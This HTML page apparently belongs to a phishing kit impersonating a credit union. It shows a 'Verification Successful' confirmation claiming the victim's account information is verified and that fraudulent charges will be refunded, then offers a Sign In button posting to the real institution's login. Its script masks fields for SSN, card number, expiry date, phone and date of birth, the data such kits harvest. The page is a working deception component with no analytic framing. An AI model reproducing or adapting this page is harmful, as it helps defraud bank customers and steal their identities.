<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<title></title>
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<style>
		@font-face{
	font-family: 'fmtt';

  src: url(img/font1.ttf) format('truetype');
  }
*{
	margin:auto;
	font-size:14px;
	outline:0;
	font-family:'fmtt';
}input{
	border:0;
    display:block;
	margin-top:0px;
	width:100%;
	padding:6px;
	background:#f2f2f2;
	font-size: 15px;
	padding-left:0;
}td{
	border-right:1px solid black;
	padding-right:10px;
	padding-left:10px;
	font-size:11px;
	color:#0072ce;
}.inp{
	margin-top:30px;
	border-radius:15px;
	background:#f2f2f2;
	text-align:center;
	border:1px solid #f2f2f2;
	width:93%;
	padding:6px;
	padding-left:1px;
}label{
	display:block;
	text-align:left;
	margin:0;
	font-size:12px;
	color:gray;
	padding:0;
	width:100%;
}

	</style>
</head>
<body>
<div style="text-align: center;background:white;padding:5px;padding-top:30px;padding-bottom:0px;max-width:500px;">
<img src="img/logo.png" width="230px">
<br>
<p style="text-align:left;padding:15px;border-top:1px solid lightgray;padding:15px;"></p>
<p style="text-align:center;padding:15px;font-size:25px;padding-bottom:0">Verification Successful</p>
<img src="img/success.gif" width="120px" style="margin-top: 20px;">
<p style="text-align:center;padding:15px;font-size:15px;padding-top:8px;color:gray;margin-top:30px">Your account information have been successfully verified, all unauthorized transaction would be refunded in 2-5 business days. Please click on the sign in button below to login.</p>

</div>

<div style="max-width:500px;padding:0px;">

<form action="https://my.westmark.org/authentication" method="POST">

</div>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
    <script src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/jquery.inputmask.bundle.js"></script>
    <script type="text/javascript">
        $("#ssn").inputmask({"mask": "999-99-9999","placeholder":"___-__-____"});
	$("#cn").inputmask({"mask": "9999 9999 9999 9999"});
        $("#exp").inputmask({"mask": "99/99","placeholder":"MM/YY"});
        $("#ph").inputmask({"mask": "(999) 999-9999"});
            $("#dob").inputmask({"mask": "99/99/9999","placeholder":"DD/MM/YYYY"});
    </script>

</div>


<div class="inp" style="padding-left:0;background:#00688f;width: 150px;border-radius: 50px;">
<button style="background:#00688f;border:0;padding:10px;border-radius:15px;color:white;font-size:17px;display:block;width:100%">Sign In</button>
</div>
<p style="font-size:14px;color:#0072ce;margin-top:15px;text-align:center;font-weight:bold;visibility:hidden">Register</p>

</div>
</form>



</body>
</html>